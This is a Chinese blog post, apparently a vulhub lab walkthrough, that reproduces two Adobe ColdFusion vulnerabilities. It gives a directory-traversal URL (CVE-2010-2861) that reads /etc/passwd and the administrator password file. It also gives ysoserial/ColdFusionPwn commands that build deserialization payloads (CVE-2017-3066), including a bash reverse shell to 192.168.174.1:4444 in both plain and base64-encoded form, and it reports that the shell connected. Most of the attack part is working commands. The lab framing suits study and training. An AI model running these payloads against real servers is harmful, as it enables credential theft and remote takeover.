vulhub漏洞复现系列之Adobe ColdFusion(cve-2010-2861文件读取漏洞、CVE-2017-3066反序列化漏洞)

最新推荐文章于 2024-05-14 23:46:30 发布
最新推荐文章于 2024-05-14 23:46:30 发布
阅读量943 收藏
点赞数
文章标签: coldfusion 信息安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43071873/article/details/110946530
版权

CVE-2010-2861)Adobe ColdFusion 文件读取漏洞

一、漏洞简介
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
二、漏洞影响
Adobe ColdFusion 8
Adobe ColdFusion 9
三、漏洞复现
直接访问http://www.0-sec.org:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en,即可读取文件/etc/passwd:

在这里插入图片描述

读取后台管理员密码http://www.0-sec.org:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/lib/password.properties%00en
在这里插入图片描述

coldfusion反序列化漏洞(CVE-2017-3066)

漏洞详情:
Adobe ColdFusion是美国奥多比(Adobe)公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。
漏洞影响
Adobe ColdFusion (2016 release) Update 3及之前的版本,
ColdFusion 11 Update 11及之前的版本,
ColdFusion 10 Update 22及之前的版本。
漏洞复现:
建议使用linux生成poc,windows会出现报错。
这里是让他在tmp文件夹中创建一个名为lin的文件


java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-BETA-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/lin' poc.ser

在这里插入图片描述

生成poc.ser文件后,
在这里插入图片描述

将POC作为数据包body发送给http://your-ip:8500/flex2gateway/amf,Content-Type为application/x-amf
具体操作呢,先通过bp抓到一个get请求包
在这里插入图片描述
然后变更请求方式
在这里插入图片描述

再把在linux生成的poc文件拉到window上,再通过bp黏贴到包中(如果你是用linux做的就直接bp抓包然后按以下操作就行),
在这里插入图片描述
发送包,返回200,到靶场中查看一下
在这里插入图片描述
在这里插入图片描述

lin文件成功创建,漏洞利用成功
那就试试直接把touch命令改为bash命令试一下能不能反弹shell

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-BETA-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'bash -i >& /dev/tcp/192.168.174.1/4444 0>&1 ' poc.ser

在这里插入图片描述

虽然返回的是200,但是没有反弹成功。

拿到http://www.jackson-t.ca/runtime-exec-payloads.html这里把bash命令加密一下
bash -i >& /dev/tcp/192.168.174.1/4444 0>&1
在这里插入图片描述

在linux中重新生成一个poc.ser,按上边步骤再来一次。

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-BETA-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 ' bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xLzQ0NDQgMD4mMSA=}|{base64,-d}|{bash,-i} ' poc.ser

在这里插入图片描述

成功反弹shell

Lin冲啊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
Adobe ColdFusion 反序列化漏洞复现CVE-2023-29300)
0xSec
08-02 2605
Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击者通过漏洞可以代码执行,可导致服务器失陷,获取服务器权限。
10 - vulhub - Adobe ColdFusion 反序列化漏洞 (CVE-2017-3066)
易编橙 · 终身成长社群,相遇已是上上签!
10-20 3679
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
09 - vulhub - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
碧海朝天素
05-14 773
如果你也是看准了Python,想自学Python,在这里为大家准备了丰厚的免费大礼包,带大家一起学习,给大家剖析Python兼职、就业行情前景的这些事儿。
Adoble ColdFusion反序列化漏洞CVE-2017-3066
Kevin's Blog
01-18 835
文章目录一、介绍1.1 漏洞介绍1.2 影响版本二、漏洞复现三、防御 一、介绍 1.1 漏洞介绍   Adoble ColdFusion是一个动态Web服务器,其运行的 CFML(ColdFusion Markup Language)针对Web应用的一种脚本语言。文件以*.cfm为文件名,在ColdFusion专用的应用服务器环境下运行。   低版本的Adobe ColdFusion存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文执行任意代码或造成拒绝服 务。 1.2 影响版本 Ad
Adobe ColdFusion 反序列化漏洞靶场复现CVE-2017-3066
qq_43232893的博客
04-12 842
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 墨者学院之Adobe ColdFusion 反序列化漏洞靶场复现CVE-2017-3066)简介一、漏洞复现开启环境CVE-2017-3066漏洞复现 简介 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程
CVE-2017-3066(Adobe ColdFusion 反序列化漏洞)
G_Fu_Q的博客
04-08 1336
本文仅做漏洞复现记录与实现,请勿用于非法用途 漏洞介绍: Adobe ColdFusion(直译:冷聚变),是一个动态Web服务器,其CFML(ColdFusion Markup Language)是一种程序设计语言,类似JSP里的JSTL(JSP Standard Tag Lib),从1995年开始开发,其设计思想被一些人认为非常先进,被一些语言所借鉴。 Adobe ColdFusion存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文执行任意代码或造成拒绝服务。 以下版本受
Adobe ColdFusion 反序列化漏洞CVE-2017-3066
黑白的博客
12-22 807
声明 好好学习,天天向上 漏洞描述 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文执行任意代码或造成拒绝服务。 影响范围 Adobe ColdFusion (2016 release) Update 3及之前的版本 ColdFusion 11 Update 11及
vulhubAdobe ColdFusion 反序列化漏洞CVE-2017-3066)和CVE-2010-2861文件包含漏洞
qq_45300786的博客
09-13 289
adobe coldfusion特征 1、8500端口 2、如图所示 验证和反弹shell都有 https://idc.wanyunshuju.com/aqld/2076.html
漏洞分析|Adobe ColdFusion 序列化漏洞CVE-2023-29300)
m0_46699477的博客
08-02 1051
通过研究 CVE-2023-29300,我们了解了 Adobe ColdFusion 产品的基本工作原理,其不安全的 WDDX 序列化实现将产生可利用的漏洞。同时,我们详细分析了通过 argumentCollection 参数传入 payload 的完整调用路径,以及为何需要传入看似与利用无关的 method 参数。在此基础上,我们探索了利用的新方向,在这个过程也踩了不少坑。阅读本篇文章后,大家在复现漏洞以及在将来需要研究此产品时,就可以少走一些弯路了,后续有机会的话,会进一步分享研究成果。
利用Vulnhub复现漏洞 - Adobe ColdFusion 反序列化漏洞CVE-2017-3066
JiangBuLiu的博客
06-28 5002
Adobe ColdFusion 反序列化漏洞CVE-2017-3066Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现POC500错误 Vulnhub官方复现教程 https://vulhub.org/#/environments/coldfusion/CVE-2017-3066/ 漏洞原理 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的C...
coldfusion-10-11-xss:CVE-2015-0345 (APSB15-07) 的概念验证代码
05-31
ColdFusion 10.x 11.x XSS -> RCE PoC 漏洞利用 此存储库包含 CVE-2015-0345 (APSB15-07) 的 XSS 向量,允许在 ColdFusion 安装上获得远程命令执行。 此漏洞仅对 ColdFusion 10 和 11 安装有效。 具体来说,...
cf-tinymce:用于创建tinyMCE实例的ColdFusion函数-支持压缩和每页多个实例
04-29
概要ColdFusion函数用于创建tinyMCE实例-使用CFN并允许每页多个实例。 这是一个不错的基础,具有不错的默认设置。程式码范例要显示一个充满名为“ read”的查询的生物信息的RTE实例,请执行以下操作: <cfoutput>#...
Coldfusion-11-Application.cfc-Template:脚本样式 Application.cfc 模板,包含 Coldfusion 11 的所有方法
06-13
Coldfusion-11-Application.cfc-模板 包含 Coldfusion 11 的所有方法的脚本样式 Application.cfc 模板。 我对 Adob​​e 的文档和缺乏脚本风格的 Coldfusion 11 示例感到沮丧,所以我创建了这个。 如何使用 更改...
coldbox-platform:用于 ColdFusion (CFML) 的现代、流畅和基于约定的 HMVC 框架
08-04
自 2005 年以来,Luis Majano 和 Ortus Solutions, Corp 的 ColdBox 平台版权所有 | 由于上帝的恩典,这个项目存在。 如果你不喜欢这个,那就不要读它... ColdBox 为您提供了现代 ColdFusion (CFML) 开发的标准化方法
ColdFusionPwn.jar
01-08
Adobe ColdFusion存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文执行任意代码或造成拒绝服务。 此工具可以Adobe ColdFusion漏洞利用,例如(CVE-2017-3066) 阅读建议:此资源开发以java为...
智慧校园音视频系统整体解决方案-1PPT(24页).pptx
07-28
智慧校园整体解决方案是响应国家教育信息化政策,结合教育改革和技术创新的产物。该方案以物联网、大数据、人工智能和移动互联技术为基础,旨在打造一个安全、高效、互动且环保的教育环境。方案强调从数字化校园向智慧校园的转变,通过自动数据采集、智能分析和按需服务,实现校园业务的智能化管理。 方案的总体设计原则包括应用至上、分层设计和互联互通,确保系统能够满足不同用户角色的需求,并实现数据和资源的整合与共享。框架设计涵盖了校园安全、管理、教学、环境等多个方面,构建了一个全面的校园应用生态系统。这包括智慧安全系统、校园身份识别、智能排课及选课系统、智慧学习系统、精品录播教室方案等,以支持个性化学习和教学评估。 建设内容突出了智慧安全和智慧管理的重要性。智慧安全管理通过分布式录播系统和紧急预案一键启动功能,增强校园安全预警和事件响应能力。智慧管理系统则利用物联网技术,实现人员和设备的智能管理,提高校园运营效率。 智慧教学部分,方案提供了智慧学习系统和精品录播教室方案,支持专业级学习硬件和智能化网络管理,促进个性化学习和教学资源的高效利用。同时,教学质量评估心和资源应用平台的建设,旨在提升教学评估的科学性和教育资源的共享性。 智慧环境建设则侧重于基于物联网的设备管理,通过智慧教室管理系统实现教室环境的智能控制和能效管理,打造绿色、节能的校园环境。电子班牌和校园信息发布系统的建设,将作为智慧校园的核心和入口,提供教务、一卡通、图书馆等系统的集成信息。 总体而言,智慧校园整体解决方案通过集成先进技术,不仅提升了校园的信息化水平,而且优化了教学和管理流程,为学生、教师和家长提供了更加便捷、个性化的教育体验。
基于Springboot和Vue的铁路订票管理系统源码 铁路订票管理系统代码(高分优秀毕业设计)
07-28
铁路订票管理系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
四足机器人 (2).pdf
最新发布
07-28
四足机器人 (2)
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值